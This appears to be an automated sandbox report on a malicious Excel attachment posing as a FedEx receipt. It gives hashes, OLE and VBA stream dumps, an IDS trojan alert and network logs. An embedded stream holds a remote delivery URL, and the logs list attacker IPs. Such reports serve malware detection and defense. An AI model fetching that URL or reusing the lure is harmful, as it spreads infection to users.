                SSDEEP:12288:8P0lFqFzu4LDJHTlNI+7d1JQ7D0hz9WH0PdZMv8uzvsFD8/1HqE5wFx/IAyiA:UQyzu4LDJzlNI+7d1OMhB9PMvP24t8gA
                MD5:7ED70967865A87C0B064B15564B4C573
                SHA1:C4AA8944D3261BB2E79EF0C309B2D5484F3C768C
                SHA-256:D61A8EEC64A824CAA9C5165A018EA14C7268D011C64D658C2044050B79A100C7
                SHA-512:2CC3819DDD4E4B1E131F2E551A09A11084526E901A8AA520BBD5F43A8F025F062551593D2102E3EFFC6A01C8C73E9C27B5BC4CB4526C99B04E087EC005C3E3AD
                Malicious:true
                Preview:......................>...............................................................j.......l.......n.......p.......................................................................................................................................................................................................................................................................................................................................................................................................................)................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 02:25:15 2024, Security: 1
                Entropy (8bit):7.956627688104983
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:FedEx Receipt_53065724643.xls
                File size:728'576 bytes
                MD5:4bb5a21106d460a7e9f63d44e47359cc
                SHA1:bb87ff08d79ebb57f97f97407db083bb13bb580d
                SHA256:adf19fed5bdfe80fc084a7ff1ad2ba59dc986dfe5b7dd7d2864c129bce51c0a0
                SHA512:6baaaaf5bab117ff4a0082b76be23540201f6ca8dc98f95fea4e0092bd63e484259c9e08defb3da30c21258cf9965cb159d1e1c59f25aa14d6b32f4c79ab9c3b
                SSDEEP:12288:ouyqFzu4L0KJnQD6NCLQDhmuePiiPLDyjXCwkhHiOGhz1gRoiskBSP6wm3Wz67WR:oizu4L0K86NCsDhmuePfL59Igmi5Tg6O
                TLSH:33F42340F527CF07D5275038AADAC9EB056DFE927B03DC0F2590B78D0931BA959EBA18
                File Content Preview:........................>...............................................................p.......r.......t.......v..............................................................................................................................................
                Icon Hash:276ea3a6a6b7bfbf
                Document Type:OLE
                Number of OLE Files:1
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2024-07-02 01:25:15
                Creating Application:Microsoft Excel
                Security:1
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 da 22 f7 e2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 da 22 e0 00 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet2"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                VBA File Name:Sheet3.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 da 22 d8 20 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet3"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 da 22 c2 c3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "ThisWorkbook"
                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.285842543212684
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                General
                Stream Path:MBD00023D34/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD00023D34/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:135530
                Entropy:7.960881833781067
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . w . . . . . G . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 77 04 98 1a cf 01 00 00 47 07 00 00 13 00 d2 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ce 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD00023D35/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD00023D35/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:31531
                Entropy:7.7082810489638165
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . c . 7 . . . U . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 63 c2 18 37 9c 01 00 00 55 06 00 00 13 00 d6 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d2 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD00023D36/\x1Ole
                CLSID:
                File Type:data
                Stream Size:570
                Entropy:5.24153243150352
                Base64 Encoded:False
                Data ASCII:. . . . D m c . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . i . l . a . n . g . . . i . n . / . B . r . l . c . B . . . q A ? . I O 1 5 W . Z T K 0 N 3 . . T ~ J Y ? . { . q . . q ^ H o V - . . Q | ~ . . . H u s : s 9 M . . q . f ~ . ! . . . k , ! . Z . . . . . . . . . . . . . . . . 2 . . . X . 0 . b . L . 1 . G . 9 . l . U . m . b . G . u . D . x . B . 7 . J . k . n . x . 6 . l . d . 8 . y . u . k . v . 9 . g . O . 2 . F . 4 . w . q . 2 . d . p . L . f . g . S . Z . k . j .
                Data Raw:01 00 00 02 d9 e5 44 6d a2 ff e3 63 00 00 00 00 00 00 00 00 00 00 00 00 a8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b a4 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 69 00 6c 00 61 00 6e 00 67 00 2e 00 69 00 6e 00 2f 00 42 00 72 00 6c 00 63 00 42 00 00 00 8e ee 71 f6 41 e4 3f a4 f6 11 fb 49 4f 31 c4 da f4 35 57 94 ce 80 5a 54 4b 30 94 c1 9d 4e 33 9d fd 1e 07 f8
                General
                Stream Path:Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:540567
                Entropy:7.999368017520309
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . + . a . h . l 2 J 5 . > ` . _ , T 9 . 0 . P ! V M . . . . . . . 4 . . . \\ . p . . p . 7 e . . Y X P + . . ? [ n v H i x . 8 . 8 ! 4 : L | Q 4 Y ' * . . q . \\ a ` . & . . ( : . G . . n J * . . . . I . K G B . . . ^ a . . . 5 . . . = . . . & . . . N < A | . . 0 ; . . . h . . . . % I . . . . ~ . . . . . 5 . . . v . . . . k = . . . 3 v . # e i - b 7 | @ . . . . . . . " . . . . . . . . . . 2 . . . 1 . . . : . # u c f . . $ ^ O F ^ c . 1 . . . ? ) . . . . 7
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 02 2b 96 e4 17 db 61 15 be 68 14 8e 88 6c ed e8 32 4a 35 7f fc 3e 60 b6 fb f8 1b 99 5f 2c 81 9f aa d5 54 e9 39 da 8b 30 07 50 f1 d6 21 97 56 4d e1 00 02 00 b0 04 c1 00 02 00 de 34 e2 00 00 00 5c 00 70 00 c6 ab 70 de 7f 37 65 00 0d a6 e7 59 58 50 2b 06 ee a5 9c 3f 5b 6e 76 48 69 78 0e 38 0a d9
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:529
                Entropy:5.27036781862275
                Base64 Encoded:True
                Data ASCII:I D = " { B 2 1 B 2 8 1 5 - 8 4 9 C - 4 D 6 7 - 9 B D A - 6 3 F E F D 6 9 0 3 3 C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 7 B 5 4 1 9 0 4 7 F 0 8 6 F 4 8
                Data Raw:49 44 3d 22 7b 42 32 31 42 32 38 31 35 2d 38 34 39 43 2d 34 44 36 37 2d 39 42 44 41 2d 36 33 46 45 46 44 36 39 30 33 33 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2644
                Entropy:3.985939433888896
                Base64 Encoded:False
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:553
                Entropy:6.362976757928573
                Base64 Encoded:True
                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . K M h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4b 4d 94 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                07/02/24-07:52:49.355011TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image804917541.216.183.13192.168.2.22
                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 07:52:22.405985117 CEST4916380192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:22.410902977 CEST8049163194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:22.411019087 CEST4916380192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:22.411312103 CEST4916380192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:22.416169882 CEST8049163194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:26.539833069 CEST8049163194.163.41.117192.168.2.22
                Jul 2, 2024 07:52:26.540054083 CEST4916380192.168.2.22194.163.41.117
                Jul 2, 2024 07:52:26.559298992 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:26.564131975 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:26.564201117 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:26.564327002 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:26.569670916 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062352896 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062407970 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062419891 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062438011 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.062484980 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.062757969 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062769890 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062781096 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062793016 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062805891 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.062828064 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.062828064 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.062828064 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.062983036 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.063477039 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.063491106 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.063538074 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.068687916 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.068725109 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.068753958 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.068809032 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.069932938 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.070028067 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.070188046 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.151154995 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.151175022 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.151186943 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.151231050 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.151231050 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.151366949 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.151561975 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.156013966 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.156029940 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.156141043 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.156191111 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.156191111 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.156327009 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.156338930 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.156493902 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.160828114 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.160844088 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.160964012 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.161544085 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.161557913 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.161659956 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.167467117 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.167480946 CEST804916423.95.235.16192.168.2.22
                Jul 2, 2024 07:52:27.167536020 CEST4916480192.168.2.2223.95.235.16
                Jul 2, 2024 07:52:27.167898893 CEST804916423.95.235.16192.168.2.22
